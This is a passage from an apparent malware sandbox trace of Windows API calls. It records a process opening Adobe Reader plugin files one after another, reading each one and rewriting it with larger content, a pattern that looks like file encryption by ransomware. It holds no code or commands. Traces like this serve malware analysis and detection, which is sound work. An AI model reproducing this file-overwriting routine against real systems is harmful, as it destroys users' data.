dwMilliseconds=0xffffffff) returned 0x0 [0083.887] ReleaseMutex (hMutex=0x168) returned 1 [0083.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.EUQ", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.887] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.EUQ", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.EUQ", lpUsedDefaultChar=0x0) returned 9 [0083.887] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.889] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.889] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.889] CloseHandle (hObject=0x1ec) returned 1 [0083.890] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Flash.PTB" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\flash.ptb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.890] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.890] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0083.891] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.891] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.891] ReleaseMutex (hMutex=0x168) returned 1 [0083.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.PTB", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0083.891] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.PTB", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.PTB", lpUsedDefaultChar=0x0) returned 9 [0083.891] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.893] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.893] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.894] CloseHandle (hObject=0x1ec) returned 1 [0083.894] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.ESP" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.esp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.895] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.895] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2000 [0083.895] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.895] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.896] ReleaseMutex (hMutex=0x168) returned 1 [0083.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.ESP", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.896] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.ESP", cchWideChar=10, lpMultiByteStr=0x1f7352c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.ESP", lpUsedDefaultChar=0x0) returned 10 [0083.896] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x311f2bc*=0x2000, lpOverlapped=0x0) returned 1 [0083.898] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.898] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2588, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x311f2d0*=0x2588, lpOverlapped=0x0) returned 1 [0083.899] CloseHandle (hObject=0x1ec) returned 1 [0083.899] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\Mcimpp.NOR" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\mcimpp.nor"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.900] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.901] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1e00 [0083.901] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.901] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.901] ReleaseMutex (hMutex=0x168) returned 1 [0083.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.NOR", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0083.901] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mcimpp.NOR", cchWideChar=10, lpMultiByteStr=0x1f7320c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mcimpp.NOR", lpUsedDefaultChar=0x0) returned 10 [0083.902] ReadFile (in: hFile=0x1ec, lpBuffer=0x2665868, nNumberOfBytesToRead=0x1e00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesRead=0x311f2bc*=0x1e00, lpOverlapped=0x0) returned 1 [0083.903] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.904] WriteFile (in: hFile=0x1ec, lpBuffer=0x2870f88*, nNumberOfBytesToWrite=0x2388, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870f88*, lpNumberOfBytesWritten=0x311f2d0*=0x2388, lpOverlapped=0x0) returned 1 [0083.905] CloseHandle (hObject=0x1ec) returned 1 [0083.905] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.DEU" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.deu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.906] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.906] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0083.906] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.906] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.906] ReleaseMutex (hMutex=0x168) returned 1 [0083.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.DEU", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.906] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.DEU", cchWideChar=13, lpMultiByteStr=0x1f7352c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.DEU", lpUsedDefaultChar=0x0) returned 13 [0083.906] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.909] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.909] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.909] CloseHandle (hObject=0x1ec) returned 1 [0083.910] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\QuickTime.NLD" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\quicktime.nld"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.911] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.911] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0083.911] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.911] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.912] ReleaseMutex (hMutex=0x168) returned 1 [0083.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.NLD", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0083.912] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.NLD", cchWideChar=13, lpMultiByteStr=0x1f7320c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.NLD", lpUsedDefaultChar=0x0) returned 13 [0083.912] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0083.914] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0083.914] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0083.914] CloseHandle (hObject=0x1ec) returned 1 [0083.915] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.DAN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.dan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0083.915] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.916] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0083.916] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0083.916] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0083.916] ReleaseMutex (hMutex=0x168) returned 1 [0083.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.DAN", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0083.916] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.DAN", cchWideChar=16, lpMultiByteStr=0x1f8867c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.DAN", lpUsedDefaultChar=0x0) returned 16 [0083.916] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.220] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.221] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.221] CloseHandle (hObject=0x1ec) returned 1 [0084.221] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP\\WindowsMedia.mpp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp\\windowsmedia.mpp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.222] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.222] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x35400 [0084.222] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.223] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.223] ReleaseMutex (hMutex=0x168) returned 1 [0084.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.mpp", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0084.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WindowsMedia.mpp", cchWideChar=16, lpMultiByteStr=0x1f88bcc, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WindowsMedia.mpp", lpUsedDefaultChar=0x0) returned 16 [0084.223] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x311f278*=0x8000, lpOverlapped=0x0) returned 1 [0084.260] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x34400 [0084.260] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0084.323] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x34400 [0084.323] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0084.323] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0084.324] WriteFile (in: hFile=0x1ec, lpBuffer=0x28ab948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ab948*, lpNumberOfBytesWritten=0x311f28c*=0x8000, lpOverlapped=0x0) returned 1 [0084.324] CloseHandle (hObject=0x1ec) returned 1 [0084.324] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\QuickTime.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\quicktime.cze"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.325] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.325] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0084.325] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.325] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.325] ReleaseMutex (hMutex=0x168) returned 1 [0084.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CZE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.326] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.CZE", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.CZE", lpUsedDefaultChar=0x0) returned 13 [0084.326] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.363] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.365] WriteFile (in: hFile=0x1ec, lpBuffer=0x2696e18*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2696e18*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.365] CloseHandle (hObject=0x1ec) returned 1 [0084.365] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\QuickTime.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\quicktime.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.366] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.366] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0084.366] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.367] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.367] ReleaseMutex (hMutex=0x168) returned 1 [0084.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.HUN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.367] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.HUN", cchWideChar=13, lpMultiByteStr=0x1f735ac, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="QuickTime.HUN", lpUsedDefaultChar=0x0) returned 13 [0084.367] ReadFile (in: hFile=0x1ec, lpBuffer=0x1eac3d8, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesRead=0x311f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0084.381] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0084.381] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x311f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0084.382] CloseHandle (hObject=0x1ec) returned 1 [0084.382] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_RUM\\QuickTime.RUM" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_rum\\quicktime.rum"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0084.383] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.383] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa00 [0084.383] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0084.383] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0084.383] ReleaseMutex (hMutex=0x168) returned 1 [0084.383] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="QuickTime.RUM", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0084.383] WideCharToMultiByte (in: CodePage=0xfde9, 